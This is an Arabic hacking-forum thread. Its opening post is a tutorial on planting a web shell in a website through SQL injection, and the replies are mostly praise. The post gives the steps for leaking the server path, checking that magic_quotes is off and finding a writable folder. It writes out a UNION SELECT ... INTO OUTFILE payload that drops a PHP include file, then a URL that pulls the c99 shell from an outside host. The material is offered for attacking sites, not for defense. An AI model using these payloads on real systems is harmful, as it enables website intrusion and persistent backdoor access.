التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 12-26-2010, 12:43 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو







جيفارا المنصوري~ غير متواجد حالياً

إرسال رسالة عبر MSN إلى جيفارا المنصوري~

 

 

إحصائية الترشيح

عدد النقاط : 10
جيفارا المنصوري~ is on a distinguished road

.... رفع الشل من خلال ثغرة السيكول SQL


السلام عليكم ورحمة الله وبركاته

اليوم بشرح لكم كيف ترفع الشل من خلال ثغره اسمها سيكول او sql


و الطريقة كالتالي :
أولا :
يجب أن نعرف مسارنا على السرفر
و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف
--------------------------------------------------------------------
بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها
-------------------------------------------------------------------
لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف '
و سيضهر لنا مسارنا على السرفر مع جملة الخطأ
-----------------
مثال:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2
هذه جملة خطأ
ومسارنا فيها..
و هو /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد
المهم نحفظ المسار و نتابع
---------------
الآن نأتي لكيفية معرفة الmagic quotes on أو off
لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة
ب load_file('/')
أي سيكون الإستغلال هكذا
نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب
http://www.target.com/file.php?id=-1...39,5,6,7,8,9
و نرى
إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off
و نستطيع مواصلة عملنا
أما إذا كان ال magic quotes on
فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة
------------------------------
طيب ضهر لنا الmagic quotes off ماذا نفعل ؟
-----------------------------
نبحث عن أي شيئ مصرح بتصريح 777
-----------------------------
و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية
مثلا هذا مسار صورة www.target.com/images/image.jpg
أي سيكون مسار الملف المصرح هو /images/
الذي يأتي بعد مسارنا على السرفر طبعا
---------------------------------
نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه
'<?include("$iraq"); ?>'
و نضيف هذا الأمر في آخر السطر
into+outfile+
ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة
home/dudi/public_html/
ثم نضيف مسار الملف المصرح ب777
/images/
ثم اسم الملف المصاب المراد رفعه بإمتداد php
مثلا example.php
------------------
ليكون الاستغلال كتالي
كود PHP:
www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php"

الآن تم إشائ الملف المقصود و هو هنا

www.target.com/images/example.php
الآن المرحلة الأخيرة هي رفع الشل على صيغة txt

وذلك بالتالي
كود PHP:
http://www.target.com/images/example...xt.tc/c99.txt?


طبعا http://c99.txt.tc/c99.txt
هو مسار الشل بصيغة txt مرفوع جاهز

اتمنى اني كفييت ووفيت <~

هذا الشرح اهداء لـ فولكآنو بعد ماشفت شرحه smilies8




vtu hgag lk oghg eyvm hgsd;,g SQL

التوقيع

إن كنتَ محبوباً لدى ربّك فاعلَم أنّكَ عظيمٌ وإن داستِ الأقدام وجنتيك !

نكته أنت !
تـضحكني كثيييييييراًًً ..
تضحكني عندما تتصنع الـضحكات وخاصةً أمامي ..
ليكن في ذهنك أمر ’’ وهو أن شخصك لايهمني ..
فقط
======================
RooT_vB@Hotmail.com

 

   

رد مع اقتباس
قديم 12-26-2010, 02:07 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
SoLiTair4Ever
::. Moderators .::
 
الصورة الرمزية SoLiTair4Ever
 

 

 
إحصائية العضو









SoLiTair4Ever غير متواجد حالياً

إرسال رسالة عبر MSN إلى SoLiTair4Ever إرسال رسالة عبر Skype إلى SoLiTair4Ever

 

 

إحصائية الترشيح

عدد النقاط : 14
SoLiTair4Ever is on a distinguished road

افتراضي


[align=center]بارك الله فيك شرح 100/100
لكن عندي ملاحظة صغيرة المرة القادمة عند كتابة الاكواد ضع وسم الاكواد لتكتب بطريقة صحيحة
[/align]

التوقيع

.
..
...

.:: قـوانـين الـشبكة العـامة ::.
......
.:: قسـم التبلــيغ عن المواضيـع الملغومـة ::.
......
هــــآم جدآآآ

يمنع منعاً باتاً
رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com

الأدارة وطاقم فريق العمل لايتحملون اي مسؤلية عن مصير الموضوع عند مخالفة القوانين


...
..
.

 

   

رد مع اقتباس
قديم 12-26-2010, 03:53 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو







جيفارا المنصوري~ غير متواجد حالياً

إرسال رسالة عبر MSN إلى جيفارا المنصوري~

 

 

إحصائية الترشيح

عدد النقاط : 10
جيفارا المنصوري~ is on a distinguished road

افتراضي


مشكور على الرد // انا ماعرف اكتب مواضيع عدل ف المنتديات ,, السمووحه على الاخطاء الكتابيه

التوقيع

إن كنتَ محبوباً لدى ربّك فاعلَم أنّكَ عظيمٌ وإن داستِ الأقدام وجنتيك !

نكته أنت !
تـضحكني كثيييييييراًًً ..
تضحكني عندما تتصنع الـضحكات وخاصةً أمامي ..
ليكن في ذهنك أمر ’’ وهو أن شخصك لايهمني ..
فقط
======================
RooT_vB@Hotmail.com

 

   

رد مع اقتباس
قديم 12-26-2010, 05:09 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو







Majabk longing غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Majabk longing is on a distinguished road

افتراضي


يعطيك العافــــــــيه يـ بطل.، تستاهل التقـيم.، ^_^

التوقيع

[SIGPIC][/SIGPIC]


تبي ترتــاح. أدخـــل.


http://www.tvquran.com/Alqatami.htm

 

   

رد مع اقتباس
قديم 12-26-2010, 05:14 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو







Majabk longing غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Majabk longing is on a distinguished road

افتراضي


جيفارا.، اعذرني والله ماقدرت اقـيم. الصورهـ كبيره وماخذهـ كل اليسارر.، يعني التقيم مأيطلع عندي ولا والله تستاهل . الخمس نجوم يـ بطل

التوقيع

[SIGPIC][/SIGPIC]


تبي ترتــاح. أدخـــل.


http://www.tvquran.com/Alqatami.htm

 

   

رد مع اقتباس
قديم 12-26-2010, 11:18 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
المفترس
:: مهووس الكمبيوتر ::
 
الصورة الرمزية المفترس
 

 

 
إحصائية العضو





المفترس غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المفترس is on a distinguished road

افتراضي


حبيب مشكور على الشرح الرائع واما قصة الاكواد يمكنكم اخواني نسخه في مفكرة وسيظهر كما يجب
وااااااااااااصل بلا فواصل

   

رد مع اقتباس
قديم 12-26-2010, 12:06 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو







جيفارا المنصوري~ غير متواجد حالياً

إرسال رسالة عبر MSN إلى جيفارا المنصوري~

 

 

إحصائية الترشيح

عدد النقاط : 10
جيفارا المنصوري~ is on a distinguished road

افتراضي


مشكورين على الردود الحلوه ^^

التوقيع

إن كنتَ محبوباً لدى ربّك فاعلَم أنّكَ عظيمٌ وإن داستِ الأقدام وجنتيك !

نكته أنت !
تـضحكني كثيييييييراًًً ..
تضحكني عندما تتصنع الـضحكات وخاصةً أمامي ..
ليكن في ذهنك أمر ’’ وهو أن شخصك لايهمني ..
فقط
======================
RooT_vB@Hotmail.com

 

   

رد مع اقتباس
قديم 12-26-2010, 01:23 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي


هلا اخي وتسلم الايادي على الشرح الرائع واصل
تم تقيم الموضوع

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 12-27-2010, 12:18 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو







جيفارا المنصوري~ غير متواجد حالياً

إرسال رسالة عبر MSN إلى جيفارا المنصوري~

 

 

إحصائية الترشيح

عدد النقاط : 10
جيفارا المنصوري~ is on a distinguished road

افتراضي


مشكورين على التقييم يآشبآآب وان شاءالله بكون مبدع نفسس باقي الشباب

التوقيع

إن كنتَ محبوباً لدى ربّك فاعلَم أنّكَ عظيمٌ وإن داستِ الأقدام وجنتيك !

نكته أنت !
تـضحكني كثيييييييراًًً ..
تضحكني عندما تتصنع الـضحكات وخاصةً أمامي ..
ليكن في ذهنك أمر ’’ وهو أن شخصك لايهمني ..
فقط
======================
RooT_vB@Hotmail.com

 

   

رد مع اقتباس
قديم 10-18-2011, 04:29 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية rabie hacker
 

 

 
إحصائية العضو





rabie hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
rabie hacker is on a distinguished road

افتراضي رد: رفع الشل من خلال ثغرة السيكول SQL


fdvoqnm

التوقيع

Dark - king

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 01:08 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0